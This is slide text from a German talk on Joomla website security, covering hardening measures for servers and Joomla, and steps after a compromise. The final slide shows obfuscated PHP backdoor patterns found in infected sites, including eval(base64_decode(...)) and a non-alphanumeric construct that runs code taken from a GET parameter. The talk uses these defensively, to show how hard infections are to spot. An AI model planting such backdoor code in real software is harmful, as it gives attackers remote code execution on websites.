2. Simon Samtleben
@lemmingzshadow
Webentwickler @ yagendoo Media GmbH in Köln
www.yagendoo.com | lemmingzshadow.net
● PHP Entwicklung
● Joomla
● Websockets
● Serveradministration
● Debian
● Nginx
● Security
● yagendoo.com
● gulli.com
● anonym.to
● 3gstore.de
● iphoneohnevertrag.de
3. Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
15. Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
16. Serverseitige Schutzmaßnahmen
● Auto IP-Blacklisting
● SSH Login nur über Keys
● Chroot für Projekte
● SFTP statt FTP
● Eigene SQL Benutzer pro Projekt
● Monitoring (Last, Prozesse, Netzwerk, …)
● Updates, Updates, Updates
17. Joomlaseitige Schutzmaßnahmen
● Nicht benötigte Erweiterungen löschen
– Auch bei „Schutzsoftware“ vorsichtig sein
– Vorsicht bei lange nicht aktualisierten Erweiterungen
● Regelmäßig auf Infektionen prüfen
– urlquery.net
– virustotal.com
– myjoomla.com
– Extensions
19. Inhalt
1.Wie funktionieren Angriffe auf Joomla?
1. Schwachstellen finden.
2. System „infizieren“.
3. Warum werden (Joomla) Webseiten angegriffen?
2.Wie kann ich mein System schützen?
1. Serverseitig
2. Joomla
3.Was tun wenn mein System kompromittiert wurde?
20.
21. Was tun wenn mein System
kompromittiert wurde?
● Don't Panic
– Keine wichtige Spuren löschen.
– Backup anlegen.
● Wenn möglich: Neu aufsetzen.
● Wenn nicht: Backup einspielen.
● Sonst: „Infektionen“ beseitigen.
22. Was tun wenn mein System
kompromittiert wurde?
● Infektionen sind schwer zu finden
– Einfach
● eval(base64_decode('...'));
– Schwieriger
● $eva1tYidakBcVSjr =
$eva1tYldakBcVSjr(chr(2687.5*0.016),
$eva1fYlbakBcVSir);
– Hacker :)
● $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++
$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++
$___.$___.++$_.$__.++$___; $_($_GET['p']);